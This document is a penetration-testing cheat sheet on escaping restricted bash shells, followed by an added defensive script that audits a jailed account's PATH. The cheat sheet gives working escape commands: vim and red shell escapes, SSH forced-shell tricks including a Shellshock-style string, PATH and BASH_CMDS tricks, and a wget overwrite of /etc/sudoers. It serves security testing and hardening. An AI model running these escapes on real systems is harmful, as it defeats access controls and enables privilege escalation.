Bash Jails

Enumeration

First, enumerate the environment as thoroughly as you can:

echo $SHELL
echo $PATH
env
export
pwd

Modify PATH

Check whether you can modify the PATH environment variable:

echo $PATH
PATH=/usr/local/sbin:/usr/sbin:/sbin:/usr/local/bin:/usr/bin:/bin
echo /home/* # List directories using shell globbing

Using vim

:set shell=/bin/sh
:shell

Create script

Check whether you can create an executable file with /bin/bash as its content:

red /bin/bash
> w wx/path # Write /bin/bash to a writable and executable path

Get bash from SSH

If you are connecting over SSH, you can use one of these tricks to execute a bash shell:

ssh -t user@<IP> bash # Get directly an interactive shell
ssh user@<IP> -t "bash --noprofile -i"
ssh user@<IP> -t "() { :; }; sh -i "

Declare

declare -n PATH; export PATH=/bin;bash -i
 
BASH_CMDS[shell]=/bin/bash;shell -i

Wget

You can overwrite files with wget, for example the sudoers file:

wget http://127.0.0.1:8080/sudoers -O /etc/sudoers
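
Seen from the side of whoever builds the jail, every technique above depends on what the restricted account's PATH exposes. The following is an added example, not part of the original page: a POSIX sh check that walks a PATH string and reports the programs this page uses (vim, ed/red, wget, ssh, bash, sh), writable PATH entries and missing entries. The helper name audit_jail_path, the RISKY list and the output labels are assumptions made for this sketch.

```shell
#!/bin/sh
# Added example (not from the original page): audit a restricted account's PATH.
# RISKY holds the programs this page uses as escape routes; extend as needed.
RISKY="vim ed red wget ssh bash sh"

# audit_jail_path PATHSTRING  (hypothetical helper name)
# Prints one finding per line:
#   BINARY <file>    an escape-capable program is reachable through PATH
#   WRITABLE <dir>   the user can drop an executable into this PATH entry
#   MISSING <dir>    the PATH entry does not exist
audit_jail_path() (
    old_ifs=$IFS
    IFS=:
    set -f                          # do not glob while splitting on ':'
    for dir in $1; do
        IFS=$old_ifs
        [ -n "$dir" ] || dir=.      # an empty PATH entry means the current directory
        if [ ! -d "$dir" ]; then
            echo "MISSING $dir"
            continue
        fi
        if [ -w "$dir" ]; then
            echo "WRITABLE $dir"
        fi
        for name in $RISKY; do
            if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
                echo "BINARY $dir/$name"
            fi
        done
    done
)

# Constructed sample: a throwaway bin directory holding a stub "vim".
demo() {
    d=$(mktemp -d) || return 1
    : > "$d/vim" && chmod 755 "$d/vim"
    audit_jail_path "$d:$d/absent"
    rm -rf "$d"
}
demo
```

Run it as the restricted user against that user's PATH; any BINARY or WRITABLE line is a jail entry to remove or lock down.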
